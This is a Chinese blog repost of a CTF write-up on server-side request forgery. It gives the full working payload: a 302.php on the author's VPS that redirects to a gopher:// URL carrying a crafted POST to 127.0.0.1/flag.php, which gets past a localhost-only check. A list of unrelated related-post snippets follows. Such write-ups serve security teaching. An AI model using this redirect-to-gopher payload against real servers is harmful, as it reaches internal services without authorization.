2. 程式人生 > 實用技巧 >SSRF CTF 例題

SSRF CTF 例題

阿新 發佈:2020-07-21

一道ctf題目,有兩個檔案:ssrf3.php和flag.php

題目意思是flag只能127.0.0.1訪問,還進行了post驗證,這就需要gopher提交post資料來繞過

curl設定了302跳轉,所以可以把302.php放在自己的vps上進行跳轉

首先獲取訪問flag.php的post請求:

    POST /flag.php HTTP/1.1

    Host: 192.168.154.130

    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0

    Accept: text/html,application/xhtml+xml,application/xml;q=0.9
 
,*/*;q=0.8

    Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3

    Accept-Encoding: gzip, deflate

    Connection: keep-alive

    Upgrade-Insecure-Requests: 1

    Content-Type: application/x-www-form-urlencoded

    Content-Length: 14

    username=admin

因為只有一臺機器,所以我直接將Host改成了127.0.0.1,再改成符合gopher協議的請求,寫入302.php。

302.php內容為:

header("Location:gopher://127.0.0.1:80/_POST /flag.php HTTP/1.1%0d%0aHost:

127.0.0.1%0d%0aUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:50.0)

Gecko/20100101 Firefox/50.0%0d%0aAccept:

text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8%0d%0aAccept-Language:

zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3%0d%0aAccept-Encoding: gzip,

deflate%0d%0aConnection: keep-alive%0d%0aUpgrade-Insecure-Requests: 1%0d%0aContent-

Type: application/x-www-form-urlencoded%0d%0aContent-Length:

14%0d%0a%0d%0ausername=admin");

流程就是在ssrf3.php提交http://www.myvpsip.xip.io/302.php,然後漏洞機器會訪問302.php,然後跳轉,利用gopher協議,自己訪問自己的flag.php同時提交username=admin的post資料。flag可以在ssrf3.php的頁面原始碼中看到。

相關推薦

SSRF CTF 例題

一道ctf題目,有兩個檔案:ssrf3.php和flag.php 題目意思是flag只能127.0.0.1訪問,還進行了post驗證,這就需要gopher提交post資料來繞過

Java String初始化String域例題解析

練習 : 建立一個類,它 包含了一個定義時就被初始化了的String域,以及另一個通過構造器初始化的String域,這兩種方式有何差異.

Python matplotlib畫曲線例題解析

這篇文章主要介紹了Python matplotlib畫曲線例題解析,文中通過示例程式碼介紹的非常詳細,對大家的學習或者工作具有一定的參考學習價值,需要的朋友可以參考下

CG CTF SQL注入1

題目連結 原始碼 <?php if($_POST[user] && $_POST[pass]) { mysql_connect(SAE_MYSQL_HOST_M . \':\' . SAE_MYSQL_PORT,SAE_MYSQL_USER,SAE_MYSQL_PASS);

關於C++中strcpy函式例題講解

基本用法 1.函式原型 char *strcpy(char *dest,const char *src) 2.從src地址開始且含有null結束符的字串複製到以dest地址開始的字串中,並返回指向dest的指標。通俗的講就是將 src字元陣列複製到dest陣列中,如果de

JAVA檔案讀寫例題實現過程解析

練習 有這樣的一個words陣列,陣列中每個字串的格式為“詞性:單詞” String[] words = {\"verb:eat\",\"verb:drink\",\"verb:sleep\",\"verb:play\",\"noun:rice\",\"noun:meat\",\"noun:hand\",\"noun:hair\"};

CTF知識點總結(一)

1.Bugku ctf 變數1 ​ 此題所用知識為超全域性變數,只需要將傳入的引數設定為$GLOBALS即可。

CTF-sql-order by盲注

本文章只討論了order by盲注,關於order by的報錯等注入不在本文章討論範圍,另有文章。

SSRF漏洞

SSRF參考視訊 (源自嗶哩嗶哩): https://www.bilibili.com/video/BV1p4411X7UZ?p=60 參考文章 :

SSRF漏洞利用之Redis大神賜予shell

0x00實驗環境 1、centos靶機(IP為:192.168.11.205,橋接模式) 2、kali黑客攻擊主機(IP為:192.168.172.129,NAT模式)

CTF-pwn-tips-zh_CN

CTF-pwn-tips-zh_CN 目錄 緩衝區溢位 在 gdb 中查詢字串 讓程式執行在指定埠上 在 libc 中查詢特定的函式偏移量

[De1CTF 2019]SSRF Me

0x01 題目給出了原始碼,我們看一下原始碼 #! /usr/bin/env python #encoding=utf-8 from flask import Flask

DP例題

奇怪的銀行 題面 某銀行因不明原因,突然限制客戶取錢,限制客戶一次操作只能取下列情況之一的金額:

SSRF漏洞簡單分析

什麼是SSRF漏洞 SSRF(伺服器端請求偽造)是一種由攻擊者構造請求,伺服器端發起請求的安全漏洞,所以,一般情況下,SSRF攻擊的目標是外網無法訪問的內部系統。

pikachu靶場——SSRF(伺服器端請求偽造)

概述 SSRF(Server-Side Request Forgery:伺服器端請求偽造)其形成的原因大都是由於服務端提供了從其他伺服器應用獲取資料的功能,但又沒有對目標地址做嚴格過濾與限制,導致攻擊者可以傳入任意的地址來讓後端伺服器對

CTF知識點總結(二)

異或注入 異或注入:兩個條件相同(同真或同假)即為假。 http://120.24.86.145:9004/1ndex.php?id=1\'^(length(\'union\')!=0)--+

【C/C++】指標步長——例題理解

連結地址:指標步長——例題理解 目錄一、例題二、解析 一、例題 下面程式的執行結果:

JS 前序遍歷、中序遍歷、後序遍歷、層序遍歷詳解,深度優先與廣度優先區別,附leetcode例題題解答案

壹 ❀ 引 按照一天一題的速度,不知不覺已經刷了快兩多月的leetcode了,因為本人較為笨拙,一道簡單的題有時候也會研究很久,看著提交了兩百多次,其實也才解決了70來道簡單題,對於二分法,雙指標等也只是有個初步概

查分約束的幾道簡單例題(糖果,layout,狡猾的商人,小k的農場)

糖果(SCOI2011, luoguP3275) 輸入 5 7 1 1 2 2 3 2 4 4 1 3 4 5 5 4 5 2 3 5 4 5 1 輸出 11 簡單的解釋:

貪心演算法-例題講解

前言: 此部落格在寫作過程中參考了大量資料和部落格,不能一一列舉,還請見諒。